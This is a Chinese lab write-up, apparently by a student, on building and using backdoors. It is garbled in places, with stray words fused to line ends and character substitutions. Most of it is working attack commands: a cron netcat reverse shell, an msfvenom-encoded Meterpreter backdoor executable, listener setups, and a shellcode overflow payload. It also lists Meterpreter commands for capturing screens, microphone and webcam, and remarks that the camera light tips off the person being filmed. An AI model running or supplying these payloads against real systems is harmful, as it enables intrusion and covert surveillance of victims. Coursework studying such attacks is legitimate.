# m分钟 h小时 dom日期 mon月 dow周几 command执行的命令 12 * * * * /bin/netcat 192.168.235.138 9999 -e /bin/sh
- 用 man socat 命令查看socat的介绍及相关用法: (socat图)linux
后门就是一个程序。git
咱们接下来学习如何使用msfenom生成后门可执行文件。咱们要生成的这个后门程序是Meterpreter. 揭开Meterpreter的神秘面纱介绍了meterpreter的一些底层原理。web
简单粗暴 msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.235.137 LPORT=5212 -f exe > 20165212_backdoor.exe 指令生成一个exe后门程序。完整指令是:shell
msfvenom -p windows/meterpreter/reversetcp -x ./fenix.exe -e x86/shikataganai -i 5 -b ‘\x00’ LHOST=192.168.235.137 LPORT=5212 -f exe > 20165212_backdoor.exe
参数说明:windows
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.235.137 //注意此处应为Linux的IP! set LPORT 5212 //后门程序里的端口号 show options exploit
说明:浏览器
如今去win中双击运行20165212_backdoor.exe,点后win7没反应,而后切回kali,经过msf的监听进程得到win的主动连接,并获得远程控制shell服务器
获取截屏: screenshot (截屏命令图(抓的屏图12))markdown
获取音频: record_mic 网络
获取摄像头和录像: webcam_snap / webcam_stream 。.dom
第一次没成功,错误提示以下 由于win7上没有装驱动 ,在虚拟机窗口右下角有个摄像头图标,点它就自动安装驱动了
可是这个很蠢,由于摄像头上的灯会亮,你偷拍别人会知道..
getuid 获取运行msf会话的用户名,从而查看当前会话具备的权限
更多的meterpreter经常使用指令能够经过输入 help 获取
use exploit/multi/handler set payload linux/x86/shell_reverse_tcp set LHOST 192.168.235.137 //注意此处应为Linux的IP! set LPORT 5212 //后门程序里的端口号 show options exploit
use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 192.168.235.137 //注意此处应为Linux的IP! set LPORT 5212 //后门程序里的端口号 show options exploit
———————下面是符合要求的、成功的!———————
perl -e 'print "A" x 32;print "\xa0\xd2\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_1
use exploit/multi/handler set payload linux/x86/shell_reverse_tcp set LHOST 127.0.0.1 set LPORT 4444 //这两个都是根据你的shellcode来的 show options exploit
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
——玩游戏的会后开外挂,那时候我会本身关掉windows Defender和杀软。游戏外挂经过驱动劫持(声卡),在和服务器数据互动的时候实现篡改。或者是浏览器漏洞,例如我用edge浏览器写博客,它莫名其妙本身崩溃,还不保存!edge是win10自带 的一个浏览器,兼容性应该没问题,因此频繁崩溃的缘由可能在于进程冲突、浏览器漏洞……
(2)例举你知道的后门如何启动起来(win及linux)的方式?
——我玩游戏开外挂,那个外挂程序就是一个后门,在我启动wegame时它会跟着启动(不隐藏),这应该是手动触发启动
(3)Meterpreter有哪些给你映像深入的功能?
——shut down
(4)如何发现本身有系统有没有被安装后门?
——日志,进程查看
实验内容较多,尤为是是meterpreter实践,有不少不少事能够作,我只写了看起来重要且经常使用的一些指令,更多的请参考《Metasploit渗透测试魔鬼训练营》。本次实验在一个理想化程度很高的环境下完成,这样在现实中是没有任何意义的。相比较于msf中花里胡哨的操做,我以为更重要的仍是去研究有堆栈保护、有杀软、有防火墙的环境下如何渗透目标,哪怕是一个bit,由于要在那样的基础上咱们后续的实验、操做才有可行性。或者是几我的凑各团队,每一个人负责一块。
markdown里传图片功能坏了。。。针对第 5个任务,虽然如今作完了,可是我继续去用第一种思路调指令,调好了再改。你们有什么想法或者思路或者发现我哪里作得有问题 请不要吝啬啊,评论区互动